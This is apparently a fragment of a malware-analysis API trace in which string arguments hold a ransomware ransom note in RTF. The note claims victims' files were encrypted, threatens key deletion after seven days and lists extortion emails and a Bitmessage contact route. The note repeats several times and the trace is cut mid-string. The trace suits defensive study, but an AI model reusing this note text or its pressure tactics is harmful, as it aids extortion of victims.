ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.440] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.440] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x38b3a68, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 